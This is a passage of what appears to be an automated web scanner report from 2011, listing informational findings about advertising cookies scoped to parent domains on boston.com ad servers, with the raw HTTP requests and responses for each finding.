uid=3698952182471149434; Domain=.turn.com; Expires=Sun, 15-Jan-2012 20:43:05 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /server/pixel.htm?fpid=4&sp=y&admeld_call_type=iframe&admeld_user_id=22e7a59d-553a-4d2e-a8a1-6434f26cd599&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: r.turn.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: uid=3698952182471149434; pf=NDcX_zsBYGyedNXi3qMeklhJgDGRxsXL4nW-oSsu0v4AEd86v8h-PzhBRGtnAlRoz7MisnmDFDgyz0hA-2hwGyILCp316Absefd-fOvjhPhg4UsKxkd8UrM-8lcTaKyN2AjFtC80xvceGkEagrzXtBy-hX0_bBlCBt6ko5LbbGAkcmhxzSMUhyXEP1EMjVkExFUZO7_uH6uqU4TVbggO2jOScYXtrCyOtL5YGiDkh7hlk4bn-xPus8sWRzOogb2Ko6Ub-B5c11CGsJOSV6yl-VfR8cF6SPURe375GKp6bYSvaJGEcqOdIV0vwOWTLXbdMDIYID7ZwLblauWBO9dJ6djnmhRBcG78MMT2WTVsK7GKj_ObR_Lgx_f0fxn2B7QZTJgyl8xxj8sxT5XM_Pf04XQM_4vlij299-XhdmIT0lN7qezjJvpc_gGfeIy2ln9Q4O9SnyVtHz0AqUEUa2_xEzEj9SmZFZgxYPAZZU1ReJp9wr5pB9rWFBEAxIcaY_g8-enRWV78rsMGaGUivi6txG3sf48mMdMLZxguOO8FgLKy2FfDvGXCH6BefHT69H4ZzJO6hwDgE92WLdnoaYk7XdHci1lLBuj9A_ddHFEbOVmcKKgDh4XSrcl6inkLAhP12aIpwdzJxDyaFwhffSWAzkALzBcTrhfbzmMmjcKyLmBoAvId_IxJwwaMThURtDF7AZK2RzFrpw2XtDGikuUzcg5PvlThFWtQbXc8YTkhwO7it5BsUipuSlNDjCxLSzZozBJAvpZBaSiDlykcP08AmgMsEWc4vSYgRQcaCdeV2p9dOXvmlUYvchAIC41YWsfzjzp7j673BFOwj7kd5piN4nwT09t9QUFieuPTlYTYuLxN5WATvM0mK-KDbn0ZCRSDWw6VHcJi1VLZK71p2IH5G3kf_oBhwjTOnNMzLRnNQb5gQDdHCGVILQ_GSkt8jIcTv-4EXfFGgUhYxl9K8gA6q2fVPJKYMLenkR53_z7-7qD7Bhb0de3mz-u8OigGHus6lq8YqB9rag0m6x7v-6jxP7SoPWxLgwiKvYZdQW-_RL07jyp0KuHGXlNga1wgAKVUFU49Pwhd7loRStsS3dnwF_O7BA70nmZ9huNYruXOAA8ET2U8OOU9RrKIRMlaXVx3dOgC2rG0F4hrpo6NUTpDKGdGTg4F9Rl9wNcACy4XbPZTbpYuE4Dq368Sg_UiNjuOsP8vWKVE9fehI1gPZO5pxrAQeVZGg-wIZkbGkclq5RdnAUwoPSxvJ8BCKL8c227GvAPDk68AwPooBVnTHzx-zk3BzWEd-pH3IdKaEgaOIZCCl5ZiPU29H319cqixiPn-pwXdsFy2HQYJ9afeYTnFMtpkEw27lGfK23pq1Aumgf2vcGrs7cXuZiZgFiIa18-IAx8KvJar-j63j-oi0PwOaSKex4EWpR3nASqE_HAAzgcjUeD4otZDQobYTgeTOS1rQfFvcOgFtifXC4-sxdOYEcCW_dsQ_GxHZf7_C9Rdjj7D8FsOM2z6P2KvGnoosdNvtgm3hny8YL0UyMuKN8TOUFRENR76gCh00Zu_v56iMiwzmpPH34AXuKovB3TKU4sIoqbFpybTV96X4YNbFXe9HDBrGGTDDj3IewhYn5Jy6cOSQPzQiBy5eFVH9N6AHGxCHLg3OEIP65yOuneU2THS_sRn7ADdO-4XWXCJTGG1V-KE6aYeVzN2AFcUjiba83-HD2NgibLaNsuOrsqmRk15T3FIy6RYGjw5ujxgP2dw8IZyLRLGUK_tgdfhadIzcIY_BXXKEzZKEO0NM1Ei1NE2ftA-3JCuRqA5Xi4SZFb6GS2TJMoGZ3hsvTbtPyEjTn8nWELPl1sEbJhVv6P-J95rAoH3fuI-HGZbYXMU3133KhE2qoT9AMLNU18sJKtxu8BXxLsdcEU2zWU9E-Y4DkT-x03Qq8Jlq6cBCGP4Q8xWRQ4gj64NcMhc0tzll5ZRASQyIkauMP0jGeDOcQ_kDie1nv8hQPwIyPyKom0QdO2EOTpmd-0Cg8JHxzOgfL1-7Vrv-BM6-Ipu0YfMWj2PjCVytilaZ8JGajjoZ6_iD0kfD7kn--V84pp6S0KFA0wYFHOMhzRklI7Zf9h5qkCrNMlQT8wHdJkNxJrkgadu0_VlGjmgZaUhihf9dSs0Xwa5GFkfeXs9fU6PsiWYUbVG5lf90B2ggqpYAn5SWLuIsHOMBlTCwL0LnzlWXLJZOL45hdjL0BQWbyPb7s77eCWCdAu4gW26YOEpDbcBo0JqPrc2OxKq91pi574VYt6WibU4dGj5jJ3oaTYEjh9xpVCw5MH80onNdN68NqxDeNmnkOd4hHuqONPAcUfbmswfIykg5y75; rrs=1%7C2%7C3%7C4%7C5%7C6%7C7%7Cundefined%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12%7C1006%7C1007%7C1008%7C13%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C18; rds=15174%7C15174%7C15174%7C15170%7C15174%7C15174%7C15174%7Cundefined%7C15174%7C15174%7C15174%7C15174%7C15174%7C15174%7Cundefined%7C15174%7C15174%7C15174%7C15174%7C15174%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C15174; rv=1; adImpCount=XEl9-VrK61OYlDDbq0pGGxK9qDj9N8Yq-RC8L7M3u-b8WrdFCUa-62hysSsfECsztx3u53x713hOGdHs2hH4A54eRIbZxuCuOfEny5g4Q5vvyaMrZETwI6pLNg-8lHcwBx5j9SG9QaMmEO6nXCjUeAr8NHZqbwRfVf_7-29ZQ3dPUL1xC6vykF_wcZeiKpIDKLchE-lw9J3csr8W1qBvLKBDigDSWV-4PwxnK6BJYJ6a83X2-8gHfiZIB9yO_48CSr7DTFA1kspm4vyZz7f-oFKd1JO_8TeGfYCaP6T3mJ4nX_UyDjQuDeV0J4DxLzIImntR_7AizpE5l54qzLMxm_6hHFZ0zNTsQxcRcycfR4tb7kg2TIufO8aOmyJKxT9twngY6WXHxR32jX1daK2bVP4NfeugtrNT-H12aSBn58lYl1fS6f9VhImQOf7kzHx87ahUpcK77Ne2qQ14vbDAVuHJ7_QMGopCUKqjTPBwJfEshr9PCYO_Pb6mVf99dGqKhGsiuBXhui5dXF29duXiFLgvAmcHKK8sCB-scI9PFtZAFew1GN7UMtgNNXxIBDGXlXuOehU5wN-RBJLiWUhgGxdZlFQfkFxGhEj7DFsCIwygmLKPUl1-DSslp_jNTeEnV5sxtRpIhNFr3R4y_IbA-uMn3DJnYbuv9fB4hgflp0IXloVtNGskTE7e3pCLr9JPtq0e-Yxil5WqDNp_Xa19VpRLdmUPzQMXTGSe2mVd-mn9LwNxDUajJ0qWfPyFisaMughPUixDVERsvPoCHHfeKQrrmfCWAcYAvCODSfTx_dt6XlyPQicl36vbwbMHKmNPdxGORK015zAMTrgRK3tzOZoFHUXb2yfg6pqH2PZcFI9k8TiCteNp6LftFs52NVT1mBI4bk12UST-LnFUowS3-RvhxTFhYtQAjmMzQGuqCoHDbFDilhrLRCGCzM6wfEY1il9fyAhhdhiX5xeErwkXNyHIaOUw0k7rEWVmhg_B3BvZ_JJ1eKyIzbgt_46WlYWQgL9ZasOD_xa3su2SzMNRN2SuA9MLS8vgRbxcjF4D-VasQd-K3D1zUp50dqChmHX6C4xm9J2ryFuX1DzhXXsB8ylVhDHg-IslHHEfTEZTSA4x79w-7fs-jv4a_nay_HqcrQ8aehmYh5Jg6VXvy35gzzP6XJ_yuUArG_onsuv3vvL9MhSKhfx_0dtVyabDgbCqa6wnc6gCdYyI1-sfJpI-QBdXR0uqmDD2eYvdS9m5DXv2uz4Zb-DPt4U0OzYsfARGt8T0lbTEs5R2ssJBAXf4RzRmJLWAXWGZ7y350hPxEYbj56fbCkLTUP4e4LG-eGTJPXN0PsrITSU8C4fiFQveo7e0JuwiiBRFBNfg8FsAuVjlEcR3t9O1geSdCpLtOklDs1_dGncbBBZQER_-paQCLIkAt3Jl7cqev_X29x1h3RSVLhbvuiUEQMd1lhXf8GDmZ0Jnx2XlDSkvkmayIRlhMWfGUifX2zWUC3ltenVJv3APnigAxJ-NYybTcJEqynuxehNV1hiWOz68umgc0zIpIVjfhKS00ZzgKSyqxNn0CdXhyaotnSsGTyNwM6ZkvI_Z10U3MfELlNkmX_XPVOU0HrhNcMsSZcik8nkd49q2eNubEURCOAjIGdoxoenAt7h7IGR2M1Z1ErhKEgsUCD2hSTIUnlH_y9NqV6g7b8e07lQA1Uh8Kq3I9sxtE4bsf-D-_nx6vDTYFdjN9w06yUer67up1KhChubA5U8BJRHU7-8bdiAU5MZxUpTEkY01NGw92liBW3paDMImJKv-PTnj78C4Uzb6zF-7vU0IBAq0Nxz6oPyeu_-tlKn4wWcc1wS0BZpUrw-_JSZnVwJkpXq8ku1YJPyJs89AI-TQjOdmv_wF3yJfWo_bhgMidGdvKsEerMw_HAA_XvCa5t1ee8A8vU9soulitrQn0XilGeOl6DjUev-tK4mWDrtJp1H73ByXN3oz5PKxU1cGfc2vPHWGNNTNsd2AtHF-A_WbAOrW2okW62_imER21-Q6lk_i6e_aWY_5C8-p6ey3Fr6swBOuIBQDVITq1YTb72FJL6I4U2ltklVfhSes07iSkkal24UryHg-2ytWanyb82T2QednMHYl4wuDCc_sYs_dex6U9CJP5_90kTMsahQIAN6uq-K1m21UcyUMLvjIshMBfZQlVNcEG6K13w3b1aVS5l4sXzJE0lMAJuiEAG3g-bWk-Mf1KEz5IgS4ObpyJaRLJM8dnU1Nhl4Gj4DbtR0q02VwtV6eFe3CztMFbpkbIC8QRi-0-t0Q0lWju26SjBcFQ0SU-Q9PM_H4NT6AI8v_boZ3SdVlbIcVdR0yZ4wedowaV7UdLSZT7Vd3BZ1KiY9UBdA5uI2cB84BCr7aSv_WzT6Y4rLfuC2S9rqcVQFVrB7RXcS8ct0eawHscfZtg6DjU2kd4mzjdZAZ1N-YY92z2OVeSZ2FL5fR9kiNgijvfD-uQGvZt18MNEuRd6-og7BHQ4MLjuFAxUjCRGcr4Wz1bF_gp-HqZlvshuxvLJX9Q1uaghvWvoDX2h3Tna6Tq_5FNrC8eFEaOBiixj5GMpqN1mMqzZCd2dYo2uIBroHY1sBGoqGendnWKNriAa6B2NbARqKhnsm1CmKqgKyOK13X-vu4sXaZhAZ7dALNrlk2ZHupjzbZY4Skgdl7-1xlrgatqP0BPkDy2gYn1fKV06W2G3H81OxfZr29Puen9VV4NGp4BUq5TwT_el8ARa0B5bXFDez7TjQPThcXUuLZr2wajJbtGXgfM7CBtk-9mAyKLE0-tkghfsQnFe8RDolHxo4SRL9-K1XKoo8vmE9KuX6fSQjzEzjIjx8ScH5O8C3okRouLhhDy36dawlh2vAyUu-Jy2pQNQ; fc=ZUZU62WSV7nfkj5OuUXlEuTbw71SxSIM1JZ50RraV4iJlDq2d88xQrqQkmk8VI-DV4N7x_k-SjlCpIAKcw_aSFfb3vCZSK3GVbftks7IMxvi3Sy-PEwXW67DoFr3mtCG

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=3698952182471149434; Domain=.turn.com; Expires=Sun, 15-Jan-2012 20:43:05 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 20:43:04 GMT
Content-Length: 342

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
src="http://cdn.turn.com/server/ddc.htm?uid=3698952182471149434&rnd=3988428324264951213&fpid=4&nu=n&t=
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=808880/size=300250/u=2/bnum=14768994/hr=15/hl=5/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=0/aolexp=0/dref=http%253A%252F%252Fwww.fakereferrerdominator.com%252FreferrerPathName%253FRefParName%253DRefValue

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

C2=vyeJOJpwHg02F8wBdbdBPcAmoZwDH4fvG8At9YA8raUYC2tBi2URwGbPGsOlGJLnFZw7LYM+wuvBYOpB5L6LI4NLGOCqyBwHcZAS; domain=advertising.com; expires=Thu, 18-Jul-2013 20:44:31 GMT; path=/
F1=B8K7l4EBAAAABAAAAEAAgEA; domain=advertising.com; expires=Thu, 18-Jul-2013 20:44:31 GMT; path=/
BASE=RagegvmNI50lwaYGzAjLGety9H7tx6n0GOPCcMMxVO/SJzIGr4njcOMwvmlYrsFznFYf9CM!; domain=advertising.com; expires=Thu, 18-Jul-2013 20:44:31 GMT; path=/
ROLL=2TgMxQnPNOiYeID!; domain=advertising.com; expires=Thu, 18-Jul-2013 20:44:31 GMT; path=/
14768994=_4e25ecaf,8285755238,808880^1040486^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=808880/size=300250/u=2/bnum=14768994/hr=15/hl=5/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=0/aolexp=0/dref=http%253A%252F%252Fwww.fakereferrerdominator.com%252FreferrerPathName%253FRefParName%253DRefValue HTTP/1.1
Host: r1-ads.ace.advertising.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/bostonglobe/300x250/bg_1064637_61606228?t=1311108266616&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.boston.com%2FBoston%2Fbusinessupdates%2F2011%2F07%2Fstate-street-announces-more-job-cuts%2F2Ah9Wno4Q7WHDubEEBBYLN%2Findex.html%3Fp1%3DNews_links&refer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue
Cookie: ACID=gz150013044372470058; C2=9ZIJOJpwHg02Ft1BdbdRbdAmoZ0WH4fvGtFt9YA8raYrC2tBi2Uh8HbPGsOlG6PnFdw7LYQRwu/BYOpRFJ6LI4NLG/G; GUID=MTMxMDY4NDI1ODsxOjE3MGliaG4wMWNtbnEyOjM2NQ; F1=Bwthk4EBAAAABAAAAYAAeEA; BASE=RagevvmNI50lwaYGzAjLGety9H7tx6n0GOPCcMMxVO/SJzIGr4njcOMwvmlYrsF!; ROLL=2TgM2QnlNOiYjDjHBUUu5Ru+iJy9peWSGwNHI9wCApF9yfwBPXWGZfL!; aceRTB=rm%3DSat%2C%2013%20Aug%202011%2018%3A00%3A44%20GMT%7Cam%3DSat%2C%2013%20Aug%202011%2018%3A00%3A44%20GMT%7Cdc%3DSat%2C%2013%20Aug%202011%2018%3A00%3A44%20GMT%7Can%3DSat%2C%2013%20Aug%202011%2018%3A00%3A44%20GMT%7Crub%3DSat%2C%2013%20Aug%202011%2018%3A00%3A44%20GMT%7C; A07L=39VpRQiFM7Ejog5CPRr6l003MZh1efyTZJsx0cnm7dLyA8oEYfYNzwQ

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1040486.808880.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Tue, 19 Jul 2011 20:44:31 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 615
Date: Tue, 19 Jul 2011 20:44:31 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: C2=vyeJOJpwHg02F8wBdbdBPcAmoZwDH4fvG8At9YA8raUYC2tBi2URwGbPGsOlGJLnFZw7LYM+wuvBYOpB5L6LI4NLGOCqyBwHcZAS; domain=advertising.com; expires=Thu, 18-Jul-2013 20:44:31 GMT; path=/
Set-Cookie: F1=B8K7l4EBAAAABAAAAEAAgEA; domain=advertising.com; expires=Thu, 18-Jul-2013 20:44:31 GMT; path=/
Set-Cookie: BASE=RagegvmNI50lwaYGzAjLGety9H7tx6n0GOPCcMMxVO/SJzIGr4njcOMwvmlYrsFznFYf9CM!; domain=advertising.com; expires=Thu, 18-Jul-2013 20:44:31 GMT; path=/
Set-Cookie: ROLL=2TgMxQnPNOiYeID!; domain=advertising.com; expires=Thu, 18-Jul-2013 20:44:31 GMT; path=/
Set-Cookie: 14768994=_4e25ecaf,8285755238,808880^1040486^1183^0,0_; domain=advertising.com; path=/click

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N2998.159462.7724395940621/B5645623.4;sz=300x250;pc=[TPAS_ID];click=http://r1-ads.ace.advertising.com/click/site=0
...[SNIP]...

13.89. http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/1113671950/SPONSOR/boston/default/empty.gif/726348573830334b61734941426a4977 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rmedia.boston.com
Path:	/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/1113671950/SPONSOR/boston/default/empty.gif/726348573830334b61734941426a4977

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

RMFD=011QjH8B; expires=Sat, 01-Jan-2000 23:59:59 GMT; path=/; domain=.boston.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/1113671950/SPONSOR/boston/default/empty.gif/726348573830334b61734941426a4977?_RM_EMPTY_& HTTP/1.1
Host: rmedia.boston.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: OAX=rcHW803KasIABjIw; s_vi=[CS]v1|26E5356B85012F68-4000011580017645[CE]; __unam=b6206f2-12fdeb21084-67db55f0-1; anonId=2115b2a8-118a-4f17-925c-f4ae050c3414; bcpage=7

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:43:03 GMT
Server: Apache
Set-Cookie: RMFD=011QjH8B; expires=Sat, 01-Jan-2000 23:59:59 GMT; path=/; domain=.boston.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;

13.90. http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/1462300313/INTRO/boston/default/empty.gif/726348573830334b61734941426a4977 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rmedia.boston.com
Path:	/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/1462300313/INTRO/boston/default/empty.gif/726348573830334b61734941426a4977

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

RMFD=011QjH8B; expires=Sat, 01-Jan-2000 23:59:59 GMT; path=/; domain=.boston.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/1462300313/INTRO/boston/default/empty.gif/726348573830334b61734941426a4977?_RM_EMPTY_& HTTP/1.1
Host: rmedia.boston.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: OAX=rcHW803KasIABjIw; s_vi=[CS]v1|26E5356B85012F68-4000011580017645[CE]; __unam=b6206f2-12fdeb21084-67db55f0-1; anonId=2115b2a8-118a-4f17-925c-f4ae050c3414; bcpage=7

Response

13.91. http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/346633134/BILLBOARD/boston/default/empty.gif/726348573830334b61734941426a4977 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rmedia.boston.com
Path:	/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/346633134/BILLBOARD/boston/default/empty.gif/726348573830334b61734941426a4977

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

RMFD=011QjH8B; expires=Sat, 01-Jan-2000 23:59:59 GMT; path=/; domain=.boston.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/346633134/BILLBOARD/boston/default/empty.gif/726348573830334b61734941426a4977?_RM_EMPTY_& HTTP/1.1
Host: rmedia.boston.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: OAX=rcHW803KasIABjIw; s_vi=[CS]v1|26E5356B85012F68-4000011580017645[CE]; __unam=b6206f2-12fdeb21084-67db55f0-1; anonId=2115b2a8-118a-4f17-925c-f4ae050c3414; bcpage=7

Response

13.92. http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/1268261386/LOGO1/boston/bw_house_HIGHLIGHT/651651421411002.html/726348573830334b61734941426a4977 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rmedia.boston.com
Path:	/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/1268261386/LOGO1/boston/bw_house_HIGHLIGHT/651651421411002.html/726348573830334b61734941426a4977

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

RMFD=011QjH8A; expires=Sat, 01-Jan-2000 23:59:59 GMT; path=/; domain=.boston.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/1268261386/LOGO1/boston/bw_house_HIGHLIGHT/651651421411002.html/726348573830334b61734941426a4977?_RM_EMPTY_& HTTP/1.1
Host: rmedia.boston.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: OAX=rcHW803KasIABjIw; s_vi=[CS]v1|26E5356B85012F68-4000011580017645[CE]; __unam=b6206f2-12fdeb21084-67db55f0-1; anonId=2115b2a8-118a-4f17-925c-f4ae050c3414; bcpage=7

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:43:02 GMT
Server: Apache
Set-Cookie: RMFD=011QjH8A; expires=Sat, 01-Jan-2000 23:59:59 GMT; path=/; domain=.boston.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rmedia.boston.com
Path:	/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/1370466985/HEADLINE2/boston/m_livenat061311_bchm_HEADLINE2/0615_SummerComcast_234.jpg/726348573830334b61734941426a4977

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

RMFD=011QjH8B; expires=Sat, 01-Jan-2000 23:59:59 GMT; path=/; domain=.boston.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/1370466985/HEADLINE2/boston/m_livenat061311_bchm_HEADLINE2/0615_SummerComcast_234.jpg/726348573830334b61734941426a4977?_RM_EMPTY_& HTTP/1.1
Host: rmedia.boston.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: OAX=rcHW803KasIABjIw; s_vi=[CS]v1|26E5356B85012F68-4000011580017645[CE]; __unam=b6206f2-12fdeb21084-67db55f0-1; anonId=2115b2a8-118a-4f17-925c-f4ae050c3414; bcpage=7

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rmedia.boston.com
Path:	/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/1374996851/CENTRAL/boston/m_fallon070611_bchm_BIGAD/300x250_bchm_070611-fallon.html/726348573830334b61734941426a4977

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

RMFD=011QjH8A; expires=Sat, 01-Jan-2000 23:59:59 GMT; path=/; domain=.boston.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/1374996851/CENTRAL/boston/m_fallon070611_bchm_BIGAD/300x250_bchm_070611-fallon.html/726348573830334b61734941426a4977?_RM_EMPTY_& HTTP/1.1
Host: rmedia.boston.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: OAX=rcHW803KasIABjIw; s_vi=[CS]v1|26E5356B85012F68-4000011580017645[CE]; __unam=b6206f2-12fdeb21084-67db55f0-1; anonId=2115b2a8-118a-4f17-925c-f4ae050c3414; bcpage=7

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rmedia.boston.com
Path:	/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/142449885/LOGO5/boston/m_dunkin020111_bchm_SPONSOR/dunkin_yt_logo100x40.jpg/726348573830334b61734941426a4977

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

RMFD=011QjH8B; expires=Sat, 01-Jan-2000 23:59:59 GMT; path=/; domain=.boston.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/142449885/LOGO5/boston/m_dunkin020111_bchm_SPONSOR/dunkin_yt_logo100x40.jpg/726348573830334b61734941426a4977?_RM_EMPTY_& HTTP/1.1
Host: rmedia.boston.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: OAX=rcHW803KasIABjIw; s_vi=[CS]v1|26E5356B85012F68-4000011580017645[CE]; __unam=b6206f2-12fdeb21084-67db55f0-1; anonId=2115b2a8-118a-4f17-925c-f4ae050c3414; bcpage=7

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rmedia.boston.com
